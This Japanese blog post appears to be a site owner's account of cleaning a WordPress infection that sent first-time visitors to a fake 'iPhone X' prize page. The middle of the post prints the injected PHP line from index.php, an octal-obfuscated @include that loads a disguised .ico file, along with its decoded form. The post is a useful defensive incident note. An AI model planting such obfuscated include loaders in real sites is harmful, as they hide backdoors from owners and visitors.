現在一部サーバアクセスに置いて、「iPhone Xがもらえる」等という不正な広告ページへ飛ばされてしまう不具合が確認されています。 既にサーバー側では対策プログラムの導入やウィルス検索を行い、問題がないことを確認していますが、発生頻度が低いことからマルウェアの動きがわかりづらく、完全に削除出来たという確認がありません。
今後この対策を行い、サーバー側のメンテナンスのため度々サーバーへのアクセスがしづらい状態になることがありますのであらかじめご了承ください。
今回のウィルスについて
今回のウィルスは恐らくWordpressの脆弱性またはプラグイン経由での侵入とみられます。
発生していたウィルスの症状は
- 「iPhone Xが当選しました」などの古典的な詐欺広告ページに飛ばされるようになる。
- 正し上記の広告が出るのは初回アクセスのみなので、一見さんが帰ってしまい、2回目以降は出ない
- 上記の理由のためかトレンドマイクロやGoogle等のページセキュリティ診断ではサイトは”正常”と診断された
というものです。 かなり厄介だったので自分のためにも、そして同じ問題に悩む他の方のためにも今回行った対応をメモって起きます。
ウィルス検索・駆除では意味がなかった
まずこの問題が判明して行ったのはウィルス検索です。
ウィルス検索にはWordpressで使える有名プラグインの「Wordfence」と「Anti-Malware Security and Brute-Force Firewall」の2種類を使いました。
二つのプラグインをインストールし、ウィルス定義ファイルのダウンロード、そしてウィルス検索を行ったところ、いくつかのphpファイルとテーマが書き換えられていることが判明。
通常、Repair(修復)をクリックすればすぐに問題のファイルを修正してくれて一件落着・・・となるのですが、今回は一筋縄ではいきませんでした。
phpファイルが直らない
主な感染していたファイルは
- index.php
- wp-config.php
- amazon associates link builderなどのプラグイン
- 各種テーマ
でした。
phpファイルに関しては先頭に以下のようなテキストが埋め込まれていました。
<?php /*9bbe5*/ @include "\057home\057ipho\156eteq\057ipho\156eteq\056net/\160ubli\143_htm\154/wp-\143onte\156t/pl\165gins\057pret\164y-li\156k/.1\07053e1\1459.ic\157"; /*9bbe5*/
自分はphpにはそれほど詳しくないですが、明らかに不自然な文字ですよね。
しかしこのままでは意味がわからないので、サイトを使ってデコードしてみました。
-
-
Online PHP Javascript Script Decoder | Quttera
PHP decoder. Use to decode encrypted malware code.
続きを見る
デコードした結果が以下。
@include "/home/××/○○/△△△/wp-content/plugins/pretty-link/.1853e1e9.ico";
はい、プラグインのPretty-linkの下の怪しいファイルへのリンクでした。
これはやばそうだと思い、そのファイルを開いたところ、icoファイル(アイコンファイル)ではなく、これもphpの文字列が並んでいました。 phpのコードは非常に長く、読むのも面倒でしたしどう見ても悪意があるファイルだったのでバックアップを取ってファイルブラウザから削除。
またファイルブラウザを開いたついでにマルウェア検出ツールで見つかっていた怪しいファイルのデータも手動で確認し、削除・編集を行いました。
削除後再度ウィルス対策ソフトによる検索を行いましたが、今のところ問題なし・・・
このまま問題なしなら良いのですが、万が一これだけやっても直らなければWordpressの再セットアップを行うしかなさそうです。